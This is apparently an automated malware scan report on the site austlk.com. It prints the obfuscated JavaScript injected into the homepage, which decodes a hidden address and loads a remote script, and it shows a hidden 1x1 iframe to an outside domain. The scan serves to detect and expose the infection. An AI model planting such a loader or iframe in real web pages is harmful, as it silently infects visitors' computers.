Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=austlk.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://austlk.com/ | 200 OK Content-Length: 11892 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)

    function vdch() {
        if (document.all.length > 3) {
            var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');
            var dchid = "";
            for (j=0;j<t.length;j++) {
                var c_rgb = t[j];
                for (i=1;i<7;i++) {
                    var c_clr = c_rgb.substr(i++,2);
                    if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i);
                }
            }
            var dch = document.createElement("script");
            dch.id = "dchid";
            dch.src = dchid;
            document.all[3].appendChild(dch);
        } else {
            setTimeout("vdch()",500);
        }
    }
    setTimeout("vdch()",500);

Antivirus reports:
Hidden iFrame found. The same iFrame was found in 4 websites. size: 1x1 src: http://ktk4gj.co.cc/qqkfbg0aaq0mba0dekcjbqynawccaqmmaw== <iframe src="http://ktk4gj.co.cc/qqkfbg0aaq0mba0dekcjbqynawccaqmmaw==" width="1" height="1"> | ||
http://austlk.com/test404page.js | 404 Not Found Content-Length: 287 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: austlk.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 Mar 2015 05:08:17 GMT
Accept-Ranges: bytes
ETag: "c56053-2e74-4aa9e85409700"
Server: Apache/2.2.3 (CentOS)
Content-Length: 11892
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Tue, 16 Aug 2011 12:28:44 GMT
...11892 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: austlk.com
Referer: http://www.google.com/search?q=austlk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.